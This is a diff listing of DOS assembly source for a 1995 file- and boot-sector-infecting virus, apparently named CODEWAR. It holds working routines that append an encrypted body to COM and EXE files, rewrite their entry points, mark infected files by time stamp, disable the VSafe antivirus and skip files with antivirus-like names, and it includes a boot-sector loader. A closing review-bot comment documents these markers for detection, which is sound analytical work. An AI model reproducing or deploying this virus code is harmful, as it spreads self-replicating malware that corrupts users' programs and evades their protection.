+ popa\r
+\r
+ JMP Exit_Int_21\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+goto_Infect_Ret:\r
+ jmp Infect_Ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Process_EXE:\r
+ mov byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE\r
+\r
+; save handle\r
+ mov word ptr cs:[ofs Handle -Reloc],bx\r
+\r
+; Dont infect to big/small EXE-files!\r
+ mov word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc] ; EXE size in 512 byte pages\r
+ cmp AX,F_Min_LengthEXE ; Don't infect files less than xxxx pages\r
+ JB goto_Infect_Ret\r
+ cmp AX,F_Max_LengthEXE ; Or bigger than xxxx pages\r
+ JA goto_Infect_Ret\r
+\r
+; save handle\r
+ push bx\r
+\r
+; seek to EOF\r
+\r
+ CALL Seek_EOF\r
+\r
+\r
+; It's OK! Process it now !\r
+ les ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc] ;Entry_Point_Disp\r
+ mov cs:[ofs Old_IP -Reloc],ax\r
+ mov cs:[ofs Old_CS -Reloc],es\r
+\r
+ les ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc] ;Stack_Disp\r
+ mov cs:[ofs Old_SS -Reloc],ax\r
+ mov cs:[ofs Old_SP -Reloc],es\r
+\r
+ mov ax,cs:[ofs File_Buffer.Buf_8h -Reloc] ; = Header size in paras\r
+ mov cl,4\r
+ shl ax,cl ; Convert to byte-format\r
+\r
+; Get file size from SFT\r
+ push ax ; Save header size\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+ mov dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+ mov cx,cs:[ofs File_SizeLo -Reloc]\r
+ MOV CH,CL\r
+ MOV CL,16\r
+ SUB CL,CH\r
+ AND CX,1+2+4+8\r
+ add ax,cx\r
+\r
+; save the padding-number\r
+ mov cs:[ofs Padded -reloc],cx\r
+\r
+ pop bx ; = Header size\r
+\r
+ sub ax,bx ; DX:AX := file size - header size\r
+ sbb dx,0\r
+\r
+ mov cx,16 ; Convert to seg:ofs format\r
+\r
+ div cx ; DX:AX := (DX:AX) / 10h\r
+\r
+ or dx,dx ; IP\r
+ jz was_rounded\r
+\r
+ xor dx,dx\r
+ mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP\r
+ mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS\r
+\r
+ inc word ptr cs:[ofs File_Buffer.Buf_16h -Reloc] ; CS\r
+ jmp rounded\r
+\r
+was_rounded:\r
+ mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP\r
+ mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS\r
+\r
+rounded:\r
+ inc ax ; Avoid the "K" TB-flag (seems unecessary)\r
+ mov word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax ; New SS\r
+ mov word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0 ; New SP\r
+\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+ mov dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+ add ax,cs:[ofs Padded -reloc]\r
+ add dx,0\r
+\r
+\r
+ add ax,Virus_Length ; Lo-word\r
+ adc dx,0 ; Hi-word\r
+\r
+ push ax ; Lo-word\r
+ shr ax,9 ;\r
+ ror dx,9\r
+ stc\r
+ adc dx,ax\r
+ pop ax\r
+\r
+ and ah,1 ; Mod 512\r
+ mov cs:[ofs File_Buffer.Buf_4h -Reloc],dx ; Size in pages (rounded up)\r
+ mov cs:[ofs File_Buffer.Buf_2h -Reloc],ax ; Size of last page (in bytes)\r
+\r
+ push cs cs\r
+ pop ds es\r
+\r
+\r
+ mov word ptr bx,cs:[ofs Handle -Reloc]\r
+ mov ax,cs:[ofs File_SizeLo -Reloc]\r
+\r
+ CALL Padding\r
+\r
+; Construct index for decryptor\r
+\r
+ PUSH AX\r
+\r
+ MOV word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf\r
+ MOV word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)\r
+ MOV word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)\r
+\r
+ POP AX\r
+\r
+ pop bx\r
+ jmp Attach\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Infect:\r
+\r
+ CALL Seek_TOF\r
+\r
+; read xx bytes\r
+\r
+ MOV AH,3Fh\r
+ MOV CX,Header_Length\r
+ MOV DX,ofs File_buffer -Reloc\r
+ INT 21h\r
+ jnb read_ok\r
+ jmp Infect_Ret\r
+\r
+read_ok:\r
+ cmp word ptr cs:[ofs File_buffer -Reloc],"ZM"\r
+ jnz Process_COM\r
+ jmp Process_EXE\r
+\r
+;----------------------------------------------------------------------------\r
+Process_COM:\r
+\r
+ mov byte ptr cs:[ofs File_Type -Reloc],File_Type_COM\r
+\r
+\r
+; seek to EOF\r
+\r
+ CALL Seek_EOF\r
+\r
+; Save 3 bytes\r
+\r
+ MOV ax,word ptr DS:[File_buffer -Reloc]\r
+ MOV DS:[ofs Rest1 -Reloc],ax\r
+ MOV al,byte ptr DS:[File_buffer -Reloc +2]\r
+ MOV DS:[ofs Rest2 -Reloc],al\r
+\r
+ CALL Seek_EOF\r
+\r
+; file smaller than xxxx bytes ?\r
+\r
+ CMP AX,F_Min_LengthCOM\r
+ JB Infect_Ret\r
+\r
+; file larger than xxxx bytes ?\r
+\r
+ CMP AX,F_Max_LengthCOM\r
+ JA Infect_Ret\r
+\r
+\r
+ CALL Padding\r
+\r
+\r
+; Construct index for decryptor\r
+\r
+ PUSH AX\r
+\r
+; layer 1\r
+ ADD AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf\r
+ MOV DS:[ofs E1_Idx_Val -Reloc],AX\r
+\r
+; layer 2\r
+ pop ax\r
+ push ax\r
+\r
+ ADD AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)\r
+ MOV DS:[ofs E2_Idx_Val -Reloc],AX\r
+\r
+; layer 3\r
+ pop ax\r
+ push ax\r
+\r
+ ADD AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)\r
+ MOV DS:[ofs E3_Idx_Val -Reloc],AX\r
+\r
+\r
+ POP AX\r
+\r
+; construct and insert a JUMP-INSTR.\r
+\r
+ MOV byte ptr DS:[File_buffer -Reloc],0E9h\r
+ SUB AX,3\r
+ MOV word ptr DS:[File_buffer+1 -Reloc],AX\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Attach:\r
+\r
+; write body at EOF\r
+\r
+ MOV AH,40h\r
+ MOV CX,Virus_Length\r
+ MOV DX,ofs Buffer -Reloc\r
+ CALL Encrypt_Virus\r
+ INT 21h\r
+ JB Infect_Ret\r
+\r
+; write JUMP to TOF\r
+\r
+ MOV AL,0\r
+ CALL Seek_TOF\r
+\r
+ MOV AH,40h\r
+ MOV CX,Header_Length\r
+ MOV DX,ofs File_buffer -Reloc\r
+ INT 21h\r
+\r
+; restore time stamps\r
+\r
+ mov AX,5701h\r
+ mov cx,cs:[ofs Old_Time -Reloc]\r
+ mov dx,cs:[ofs Old_Date -Reloc]\r
+ and cl,11100000b\r
+ or cl,Time_Stamp ; Mark with Time-ID\r
+ INT 21h\r
+\r
+Infect_Ret:\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Padding:\r
+ MOV AH,AL\r
+ MOV AL,16\r
+ SUB AL,AH\r
+ AND AX,1+2+4+8\r
+ MOV DX,AX\r
+\r
+; seek forward\r
+ MOV AL,01h\r
+ call Seek_File\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Deinstall_Vsafe:\r
+ pusha\r
+ push ds es\r
+\r
+ MOV DX,5945h\r
+ MOV AX,0FA01h\r
+ INT 16h\r
+\r
+ pop es ds\r
+ popa\r
+ ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Check_If_AV_Name proc near\r
+ cmp byte ptr es:[di.SFT_File_Name],"L"\r
+ jz Found_AV_Name\r
+ cmp byte ptr es:[di.SFT_File_Name],"-"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"BT"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"CS"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"-F"\r
+ jz Found_AV_Name\r
+ cmp word ptr es:[di.SFT_File_Name],"IV"\r
+ jz Found_AV_Name\r
+Found_AV_Name:\r
+ ret\r
+Check_If_AV_Name endp\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Seek_EOF:\r
+ MOV AL,02h\r
+Seek_TOF:\r
+ XOR DX,DX\r
+Seek_File:\r
+ MOV AH,42h\r
+ XOR CX,CX\r
+ INT 21h\r
+ RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int21 PROC NEAR\r
+ pushf\r
+ call dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+ ret\r
+Call_Old_Int21 ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int2F PROC NEAR\r
+ pushf\r
+ call dword ptr cs:(ofs Old_Int_2F -Reloc)\r
+ ret\r
+Call_Old_Int2F ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_24:\r
+ MOV AL,03h\r
+ IRET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Old_Int_13 dd 0\r
+Old_Int_1C dd 0\r
+Old_Int_21 dd 0\r
+\r
+Old_Int_2f dd 0\r
+\r
+Old_Time dw 0\r
+Old_Date dw 0\r
+\r
+Handle dw 0\r
+\r
+; If Int 21h allready captured then 1 else 0\r
+Got_Int_21 db 0\r
+\r
+File_SizeHi dw 0\r
+File_SizeLo dw 0\r
+\r
+Padded dw 0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+BS_first_word dw 0\r
+Old_BS_code db 32 dup ('B')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; The first word of the PAR/BS is stored here\r
+\r
+JBS_first_word:\r
+ jmp $ + 60h\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Start_JBoot:\r
+ XOR DI,DI\r
+ MOV SI,7C00h\r
+\r
+ CLI\r
+ MOV SP,SI\r
+ MOV SS,DI\r
+ STI\r
+\r
+; read xx sectors to 7e00h\r
+\r
+ MOV ES,DI\r
+ MOV AX,0204h ; !!!!!! Sectors !!!!!!\r
+ MOV BX,7c00h+512\r
+\r
+ MOV CX,1234h\r
+ ORG $-2\r
+Ptc_CX dw 0004h\r
+\r
+ MOV DX,1234h\r
+ ORG $-2\r
+Ptc_DX dw 0080h\r
+\r
+ nop\r
+ nop\r
+\r
+ INT 13h\r
+\r
+; Jump to the reload code from 2 sectors\r
+; The offset in the BS/PAR where this instuction is executed is at\r
+; BS/PAR:60h+($-Start_Jboot)\r
+\r
+ jmp $ + 512 - ($-Start_Jboot+60h) ;+512 -125\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+ db " [[ Cú0úDúEúWúAúR ]] <32> Germany 1995 "\r
+ db "Virtually called to life & survival by"\r
+\r
+ db "RGOEPMSQO & NJOENBOJBD"\r
+\r
+ db " ==>= AllE GUtEN DiNGE SiND DREi ==>= "\r
+\r
+ db 0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Encrypted_Code_End equ $\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+File_buffer:\r
+ db Header_Length dup ('H')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; here is the virus copied and encrypted\r
+Buffer equ $\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+CODE ENDS\r
+ END Sample\r
+\r
+\r
+; CODEWAR.ASM\r
+\1a
\ No newline at end of file
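Review bot: The constants `Time_Stamp = 13` and `TOM_Decrement_value = 5`, and the self-checks in `Is_COM`/`Is_EXE` and in `Int13_Works` above `BS_not_infected`, carry no comment naming the artefact they define, although these are exactly the values an analyst would use to recognise an affected file, sector or memory image. Beside `Time_Stamp` I would add `; marker: low 5 bits of the DOS file time (2-second units) forced to 13; files already carrying it are skipped`, and beside `TOM_Decrement_value` `; BIOS base-memory word at 0:0413h is lowered by this many KB at boot`. At the two `CMP` lines before `BS_not_infected`, a comment such as `; sector counts as marked when it starts with EB 5E and holds 33 FF at offset 60h` would state the boot-sector test in one place. The header line about SSC not detecting infected objects is a 1995 claim and should be dated as such, since, as far as this listing shows, `Encrypt_Virus` patches only the key and index words and leaves the instructions before `E1_Encrypted_Code` unencrypted.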